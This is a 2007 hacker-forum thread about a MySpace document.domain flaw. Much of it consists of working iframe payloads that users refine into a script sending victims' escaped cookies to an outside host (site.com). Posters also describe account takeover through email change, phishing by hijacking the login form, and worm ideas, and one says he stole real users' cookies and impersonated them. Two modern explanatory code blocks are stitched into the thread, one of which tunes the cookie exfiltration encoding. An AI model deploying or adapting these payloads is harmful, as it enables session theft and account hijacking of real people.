MySpace's "domain generalization"
Posted by: trev
Date: January 25, 2007 08:59PM

RSnake mentioned in the blog how MySpace's own JavaScript code makes it vulnerable so I decided to take a look at http://x.myspace.com/js/myspaceJS024.js. The code is horrible, their "creative" use of eval() is probably exploitable in more than one way. But there is also something more interesting, take a look at function generalizeDomain(). They trim the domain name leaving only myspace.com and put it into document.domain. But they forget that one can open the site as www.myspace.com. (note the dot at the end) and then document.domain will become "com.". Now all one needs is a server with a .com domain where one can put this code:

<script type="text/javascript">
document.domain = "com.";
</script>
<iframe src="http://home.myspace.com./" onload="alert(frames[0].document.cookie)"></iframe>

That's it, full control over MySpace. I tried navigating to the "edit profile" page and changing something - easy.

Careless use of document.domain seems to be a common mistake, I found a similar vulnerability in live.com (don't want to disclose it yet).

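As an added example (not code from the thread and not MySpace's script), here is a stand-alone model of trev's finding: generalizeDomain() reproduced with the hostname passed in instead of read from document.domain, a hardened variant beside it, and the browser's post-relaxation origin check simulated as equality of the two document.domain strings, which is the Firefox-era behaviour the thread relies on (the attacker may set document.domain to any dot-suffix of its own hostname). SITE_DOMAIN, the evil.com hostnames and the helper names are assumptions made for the example.

```javascript
// Added example, not MySpace's code: a model of the document.domain
// "generalization" bug and a hardened replacement.

// Same logic as the vulnerable generalizeDomain(), with the hostname passed in.
// For "home.myspace.com." the labels are ["home","myspace","com",""], so the
// last two labels joined give "com." instead of "myspace.com".
function generalizeDomain(hostname) {
  const parts = hostname.split('.');
  const n = parts.length;
  if (n >= 2) return parts[n - 2] + '.' + parts[n - 1];
  return hostname;
}

// Hardened version (assumption: the site owns exactly one registrable domain).
// Strip any trailing dots, lower-case, and only relax to the pre-approved
// domain, and only for hosts that are actually under it. Anything else is an
// error rather than a guess.
const SITE_DOMAIN = 'myspace.com';
function generalizeDomainSafe(hostname) {
  const host = hostname.toLowerCase().replace(/\.+$/, '');
  if (host === SITE_DOMAIN || host.endsWith('.' + SITE_DOMAIN)) return SITE_DOMAIN;
  throw new Error('refusing to relax document.domain for ' + hostname);
}

// Values an attacker-controlled page on `hostname` may assign to
// document.domain: its own host or any suffix with at least one label
// removed. "evil.com." therefore offers "com.", while "evil.com" offers only
// itself, which is why the victim must be reached via the trailing-dot form.
function attackerChoices(hostname) {
  const labels = hostname.split('.');
  if (labels.length < 2) return [hostname];
  const out = [];
  for (let i = 0; i <= labels.length - 2; i++) out.push(labels.slice(i).join('.'));
  return out;
}

// Simulated check: can a page on attackerHost script a frame loaded from
// victimHost once the victim has run `relax` on its own hostname? Modelled as
// "the attacker can pick a document.domain equal to the victim's". If the
// victim refuses to relax, its domain stays its full hostname.
function canAccess(attackerHost, victimHost, relax) {
  let victimDomain;
  try {
    victimDomain = relax(victimHost);
  } catch (e) {
    victimDomain = victimHost;
  }
  return attackerChoices(attackerHost).includes(victimDomain);
}

// Walk-through of the thread's scenario.
console.log(generalizeDomain('home.myspace.com'));   // myspace.com (intended)
console.log(generalizeDomain('home.myspace.com.'));  // com. (the bug)
console.log(canAccess('evil.com.', 'home.myspace.com.', generalizeDomain));     // true
console.log(canAccess('evil.com', 'home.myspace.com', generalizeDomain));       // false
console.log(canAccess('evil.com.', 'home.myspace.com.', generalizeDomainSafe)); // false
```

The hardened function still relaxes the origin, which is the weakest acceptable fix; the durable one is not to touch document.domain at all and to pass data between subdomains with postMessage. Modern browsers have deprecated setting document.domain, and Chrome now refuses it by default unless the site opts out of origin-keyed agent clusters with the Origin-Agent-Cluster header, so any remaining use of this pattern is worth grepping for during a review.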
Re: MySpace's "domain generalization"
Posted by: rsnake
Date: January 25, 2007 09:09PM

So basically what you are saying is if you can find an XSS hole in any .com domain you can steal MySpace cookies. ;) Hahah... beautiful.

- RSnake
Gotta love it. http://ha.ckers.org

Re: MySpace's "domain generalization"
Posted by: trev
Date: January 25, 2007 09:25PM

I don't even need to steal their cookies; I can do whatever the users can do. For example I can spam other users in their name. And I don't need to look for XSS, I can register on geocities.com and put my page there. Then I'll only need to find a way to get MySpace users to visit this page - but that shouldn't be too difficult.

Edit: It seems that one can change the email address without entering the current password. Then I guess it is possible to change it to my own email and request password recovery - and now I am the new owner of the account.



Edited 1 time(s). Last edit at 01/25/2007 09:38PM by trev.

Re: MySpace's "domain generalization"
Posted by: TrainReq
Date: January 26, 2007 12:13AM

http://nightstarproductions.com/ha.html ... doesnt work.. did i do anything wrong? or is it patched?

Re: MySpace's "domain generalization"
Posted by: kuza55
Date: January 26, 2007 01:12AM

That's pretty cool; I've always wondered if the fact that you can use the full or non-full domains in browsers would become exploitable somehow.

@TrainReq:

You need to send users to the .com. address, rather than the .com address, so the following link works:

http://nightstarproductions.com./ha.html

But sadly this attack doesn't work against IE, because not only are some (all?) of their cookies httpOnly, but IE also treats myspace.com and myspace.com. as different domains, and so if you are logged into myspace.com, the user cannot get your cookies via myspace.com.

Furthermore myspace login URLs are hard coded, so it is impossible to get a user to login by sending them a link to say, some user photos where they were not logged in and be forced to login.

So yeah, while it is pretty cool, this doesn't work in IE.

Re: MySpace's "domain generalization"
Posted by: trev
Date: January 26, 2007 03:34AM

Yes, I tested this in Firefox, and I only tested that in IE and Opera you can access the frame's contents. However, only in Firefox the cookies for myspace.com. are in fact the same. So what one can do in Opera and IE: put a link to MySpace in the page, like "Check out this cool image!" When he clicks it the link should be opened with JavaScript using window.open() - that way the user will see that it is an authentic MySpace window (after all, they are trained to log in only on login.myspace.com) and you keep a reference to the window. I don't know much about how MySpace works, but I guess you can find a link that will require authentication, if not - fake it, you can change this window's content however you like. Changing the action of the log in form won't help, cookies are explicitly bound to "myspace.com". However, you won't need it - simply change the onsubmit handler and steal whatever the user enters there.

Re: MySpace's "domain generalization"
Posted by: kuza55
Date: January 26, 2007 04:26AM

That's a very good point, I (like a lot of people - I think) tend to get caught up in trying to get access to cookies, where all we need is the ability to execute actions, or get their credentials.

Re: MySpace's "domain generalization"
Posted by: eyeced
Date: January 26, 2007 08:56AM

Fuck me, that's an amazing find. Excuse the language, but that is quite magic. Well done trev.

Although could you elaborate on this please..

"I can do whatever the users can do. For example I can spam other users in their name"

Also, I think with a lot of thought and some sick ajax coding, there could be some potential here, for an amazing worm, especially after reading about being able to break cross domain restrictions in javascript.

Re: MySpace's "domain generalization"
Posted by: bubbles
Date: January 27, 2007 09:00AM

Sounds like an interesting idea for myspace resource sites... Auto post a bulletin to advertise your website every time someone visits it still logged into myspace.

-bubbles
http://webmastertutorials.net

Re: MySpace's "domain generalization"
Posted by: trev
Date: January 29, 2007 01:14AM

eyeced, if I get an authenticated MySpace user on my site, I can open MySpace in a hidden frame. Since the cross-domain restrictions no longer work, I can simply find the link I need (e.g. "Home"), insert the dot in the domain name and click it. This vulnerability is on all MySpace subdomains so I don't have to worry about losing control when the frame goes to some other location. I can find forms, fix their action URL and submit them.

There is some "protection" there, generalizeDomain() isn't called for a few actions like "blog.edit". However, it doesn't do unescape in the check - I didn't try but I think that replacing 'b' by %62 will make this check no longer work.

Re: MySpace's "domain generalization"
Date: January 29, 2007 10:06PM

The offending script has been removed.

Re: MySpace's "domain generalization"
Posted by: kuza55
Date: January 29, 2007 11:16PM

@phantomcircuit

Not for me it hasn't, when I go there I can still find:

function generalizeDomain()
{
	var domainArray = document.domain.split(".");
	var domainArrayLength = domainArray.length;
	if (domainArrayLength >= 2) {document.domain = domainArray[domainArrayLength - 2] + "." + domainArray[domainArrayLength - 1];}
}

Re: MySpace's "domain generalization"
Date: January 30, 2007 10:43AM

That's weird when I posted that the entire javascript file was different. (yes correct url) and the document.domain property was set to myspace.com on every page.

weird.

Re: MySpace's "domain generalization"
Posted by: jeremy02
Date: February 06, 2007 08:39PM

Can you go into more detail about how to use this?


If I wanted to steal cookies, would this code suffice?


<script type="text/javascript">
document.domain = "com.";
</script>
<iframe src="http://home.myspace.com./" onload=window.location('http://www.site.com?c='+document.cookie)></iframe>


Then just get the user to visit the page?

Re: MySpace's "domain generalization"
Posted by: Anonymous User
Date: April 03, 2007 01:11PM

@jeremy02
That code wouldn't work because it's only calling the cookies from site.com, while you need to call it from the iframe.
This is how it should be formatted:

<script type="text/javascript">
document.domain = "com.";
</script>
<iframe src="http://home.myspace.com./" onload="document.location="http://site.com?c="+(frames[0].document.cookie)"></iframe>

However, what trev is trying to emphasize is that you don't need to require their cookies, you can merely execute malicious commands via the hidden iframe. aka, changing their email, or spamming off multiple bulletin board messages... just to list a few of the options, that is.

Re: MySpace's "domain generalization"
Posted by: Spyware
Date: April 04, 2007 02:05AM

I'm confused. Are you saying that sites where you can put a dot behind the domain (.com.) and the document.domain is without the dot are exploitable?

Re: MySpace's "domain generalization"
Posted by: trev
Date: April 04, 2007 06:32AM

Sites that can be tricked into setting document.domain to something like "com" or "com." are exploitable - because you can load them into an iframe on your page that will change document.domain in the same way, and that gives you access to all data inside the frame.

Re: MySpace's "domain generalization"
Posted by: SW
Date: April 04, 2007 09:27AM

trev Wrote:
-------------------------------------------------------
> Sites that can be tricked into setting
> document.domain to something like "com" or "com."
> are exploitable - because you can load them into
> an iframe on your page that will change
> document.domain in the same way, and that gives
> you access to all data inside the frame.

Didn't know this. :-)

Is this thing still an issue for myspace?

Re: MySpace's "domain generalization"
Posted by: Spyware
Date: April 04, 2007 12:16PM

https://www.cia.gov./
?

Re: MySpace's "domain generalization"
Posted by: trev
Date: April 04, 2007 07:37PM

Spyware, this site doesn't set document.domain.

Re: MySpace's "domain generalization"
Posted by: Spyware
Date: April 05, 2007 01:42AM

Aah, now I got it, thanks. (Trev, check your PM box please)

Re: MySpace's "domain generalization"
Posted by: Royal2000H
Date: April 08, 2007 07:52AM

Actually 142teeth, your code breaks due to the "

so this would be the code:

<script type="text/javascript">
document.domain = "com.";
</script>
<iframe src="http://home.myspace.com./" onload="document.location='http://site.com?c='+(frames[0].document.cookie)"></iframe>



Edited 1 time(s). Last edit at 04/08/2007 08:13AM by Royal2000H.

Re: MySpace's "domain generalization"
Posted by: Royal2000H
Date: April 08, 2007 08:40AM

trev can you or someone

show an example of how to change the person's display name or add something to their profile or anything else?

ps, stealing the cookie with what I posted above won't work because the cookie gets cut off

Re: MySpace's "domain generalization"
Date: April 08, 2007 02:28PM

Royal2000H Wrote:
-------------------------------------------------------
> ps, stealing the cookie with what I posted above
> won't work because the cookie gets cut off

Escape the cookie first or each ampersand in the cookie will just get read as denoting a new variable.
c = escape(document.cookie);
That has never ceased to work for me.


Royal2000H Wrote:
-------------------------------------------------------
> trev can you or someone
>
> show an example of how to change the person's display name or add something to
> their profile or anything else?

It would be very helpful for me to see a working example too. I'm not sure where to begin. Thanks for any help in advance.

Re: MySpace's "domain generalization"
Posted by: Royal2000H
Date: April 08, 2007 04:52PM

digitalIllusionism Wrote:
-------------------------------------------------------
>
> Escape the cookie first or each ampersands in the
> cookie will just get read as denoting a new
> variable.
> c = escape(document.cookie);
> That has never ceased to work for me.
>
>


Thanks, that works,
here's the updated version


<script type="text/javascript">
document.domain = "com.";
</script>
<iframe src="http://home.myspace.com./" onload="stolenc = escape(frames[0].document.cookie); document.location='http://site.com?c='+(stolenc)"></iframe>

still figuring out how to use this stolen cookie, I was thinking the cookies.txt file but it says not to edit it... but maybe that's bs (I'll google it)

the more interesting part, though, is doing stuff, like I posted above

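The truncation Royal2000H and digitalIllusionism discuss, as an added example that is not from the thread: one constructed cookie string is put into the exfiltration query string raw, with escape() as the thread suggests, and with encodeURIComponent(), and the WHATWG URL parser (standing in for whatever query-string parser the collecting server runs) shows what actually arrives. The site.com URL and the cookie names and values are constructed for the example.

```javascript
// Added example, not from the thread: why a raw cookie string gets cut off
// in a query string, and which encoder survives the round trip.

// Constructed sample Cookie header: two cookies, the first containing '=',
// '&' and '+' in its value.
const SAMPLE_COOKIE = 'MYUSERINFO=abc=def&x+y; SESSION=123';

// Build the exfil URL the way the thread does, optionally through an encoder.
function buildUrl(cookie, encoder) {
  return 'http://site.com/?c=' + (encoder ? encoder(cookie) : cookie);
}

// What the receiver sees for parameter c. URLSearchParams splits on '&',
// turns '+' into a space and then percent-decodes, which is the usual
// application/x-www-form-urlencoded treatment.
function receivedCookie(url) {
  return new URL(url).searchParams.get('c');
}

// Raw: everything after the first '&' becomes a second parameter and is lost.
console.log(receivedCookie(buildUrl(SAMPLE_COOKIE)));
// -> MYUSERINFO=abc=def

// escape(): '&' and '=' are now safe, but escape() leaves '+' alone, and the
// receiver decodes that '+' as a space, so the value is still corrupted.
console.log(receivedCookie(buildUrl(SAMPLE_COOKIE, escape)));
// -> MYUSERINFO=abc=def&x y; SESSION=123

// encodeURIComponent(): '+' becomes %2B and the string round-trips intact.
console.log(receivedCookie(buildUrl(SAMPLE_COOKIE, encodeURIComponent)));
// -> MYUSERINFO=abc=def&x+y; SESSION=123
```

escape() happened to be enough for the cookie values in the thread, but it is a legacy function that also mangles non-ASCII characters; encodeURIComponent() is the encoder that matches how the receiving side decodes.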
Re: MySpace's "domain generalization"
Posted by: Royal2000H
Date: April 08, 2007 06:35PM

apparently the only cookie needed to login is called "MYUSERINFO"
the other ones are not necessary for logging in

Re: MySpace's "domain generalization"
Posted by: Spikeman
Date: April 11, 2007 01:47AM

There's no way to log in as a user by stealing their cookie unless you can spoof your IP and your user agent to be the same as theirs.

Re: MySpace's "domain generalization"
Posted by: trev
Date: April 11, 2007 04:59AM

MySpace binds sessions to IP addresses? That would be unusual...

Re: MySpace's "domain generalization"
Posted by: Royal2000H
Date: April 14, 2007 05:24PM

Spikeman Wrote:
-------------------------------------------------------
> There's no way to log in as a user by stealing
> their cookie unless you can spoof your IP and your
> user agent to be the same as theirs.


1. spoofing user agent is easy
2. you don't need to spoof user agent or IP

I successfully stole people's cookies, applied only the MYUSERINFO cookie, and was able to be them :)

Re: MySpace's "domain generalization"
Posted by: Anonymous User
Date: April 14, 2007 05:47PM

@Royal2000H,
hm, could have sworn I typed it correctly.
however, it seems to work perfectly for me.

and yea, MYUSERINFO logs you in.
shame IE doesn't store it the way that's productive to, per se, us. ^_^
